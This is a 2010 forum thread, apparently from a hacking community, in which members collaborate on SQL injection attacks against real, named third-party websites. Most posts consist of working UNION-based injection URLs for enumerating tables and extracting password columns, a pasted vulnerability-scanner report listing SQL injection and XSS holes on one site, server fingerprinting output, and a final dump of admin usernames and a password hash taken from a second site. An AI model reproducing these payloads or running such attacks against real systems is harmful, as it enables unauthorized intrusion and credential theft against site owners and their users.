Anyone want to continue this? [SQL Injection]
Posted: Sun Jan 31, 2010 11:27 am
by adit_coolz
please head to the scene
Sorry, I'm still just trying things out; if I've made any mistakes, please correct me, masters :kaca:
Re: Anyone want to continue this? [SQL Injection]
Posted: Sun Jan 31, 2010 1:30 pm
by shad.hckr
Code:
http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+SELECT+1,column_name,3,4,5,6+FROM+information_schema.columns+where+table_name=0x6163636573732d636f6e74726f6c2d7573657273--
come on, keep going...
Re: Anyone want to continue this? [SQL Injection]
Posted: Sun Jan 31, 2010 5:04 pm
by sinichi
I can't play with SQL, so I'm just sitting here following along with my mat rolled out.. watching the masters in action
Code:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style>table{table-layout:fixed;overflow:hidden;}</style><title>
Scan Report
</title>
</head><body>
<center>
<br><br><br><br><br><br><br><br><h1>
Xcode Scan Report<br>
</h1><br><br><br><br><br><br><br><br>Made By Sinichi<br><br><br><br><br><br><br><br>Created By Xcode - Web Vulnerability Scanner<br>2010-01-31<div style="page-break-after:always"> </div><h2>
Vulnerability Result
</h2><table border="1" width="640" cellspacing="0" bordercolordark="009099">
<tr><td>URL</td><td>Type</td><td>KeyWord</td><td>Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION+SELECT+1,GROUP_CONCAT(column_NAME),3,4,5,6 FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x6163636573732d636f6e74726f6c2d7573657273--</td><td>GET</td><td>http://www.essaygifts.co.za/catalogue-list.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>Integer</td><td>upload</td><td>SQL Injection Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>GET</td><td>http://www.essaygifts.co.za/product-list.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td>http://www.essaygifts.co.za/product-list.php?id=4</td><td>POST</td><td>http://www.essaygifts.co.za/product-list.php|search=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(Form)</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>Integer</td><td>html</td><td>SQL Injection Vulnerability</td></tr><tr><td>http://www.essaygifts.co.za/product.php?id=55</td><td>GET</td><td>http://www.essaygifts.co.za/product.php?id=<>%3c%3e%253c%253e</td><td>Cross Site Scripting(URL)</td></tr><tr><td></td></tr>
</table><br>
</center>
</body>
</html>
Re: Anyone want to continue this? [SQL Injection]
Posted: Sun Jan 31, 2010 8:34 pm
by SeiM
I don't get it yet
:sakit:
Re: Anyone want to continue this? [SQL Injection]
Posted: Sun Jan 31, 2010 10:55 pm
by shad.hckr
come on, keep at it.. search the forum and then practice on that site.. hahaha..
Re: Anyone want to continue this? [SQL Injection]
Posted: Mon Feb 01, 2010 1:21 am
by adit_coolz
Oh man, I give up,, :circle:
failed again, failed again :putusasa:
Re: Anyone want to continue this? [SQL Injection]
Posted: Mon Feb 01, 2010 7:32 am
by shad.hckr
Which part failed, bro?? Just share it with us...
Re: Anyone want to continue this? [SQL Injection]
Posted: Mon Feb 01, 2010 9:37 am
by adit_coolz
Code:
http://www.essaygifts.co.za/catalogue-list.php?id=2+UNION+ALL+SELECT+1,GROUP_CONCAT(id,0x3a,password),3,4,5,6+FROM+0x6163636573732d636f6e74726f6c2d7573657273--
error :putusasa:
Code:
http://www.essaygifts.co.za/catalogue-list.php?id=-2+UNION%20SELECT+1,GROUP_CONCAT%28id,0x3a,password%29,3,4,5,6+FROM+access-control-user--
wrong again :mati:
:pusing:
Re: Anyone want to continue this? [SQL Injection]
Posted: Mon Feb 08, 2010 3:49 am
by racerx
adit_coolz wrote: please head to the scene
Sorry, I'm still just trying things out; if I've made any mistakes, please correct me, masters :kaca:
hmmm
Server = Apache/1.3.34 (Debian) mod_auth_pam/1.1.1 mod_gzip/1.3.26.1a mod_perl/1.29 mod_fastcgi/2.4.2 AuthMySQL/4.3.9-2 mod_ssl/2.8.25 OpenSSL/0.9.8c
Version = 5.0.32-Debian_7etch11
Powered by = PHP/5.2.0-8+etch16
Attack Type = SQL Union Injection
Current User = [email protected]
Current Database = essayh_db1
Supports Union = yes
Union Columns = 6
Re: Anyone want to continue this? [SQL Injection]
Posted: Wed Feb 10, 2010 1:00 am
by adit_coolz
The one above confused me.. searched again.. and hey, got this one...
[+] URL: http://www.juventus.co.id/pages.php?id_ ... de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 00:41:18
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: juvewebdb
User: juveweb@localhost
Version: 5.0.51b-community-nt
[+] Dumping data from database "juvewebdb" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 3
[0] dana:dana:
[1] Mazh
[2] admin:25c2202579eb40e66c5017012db9ee62:25c2202579eb40e66c5017012db9ee62:
:kaca: :love: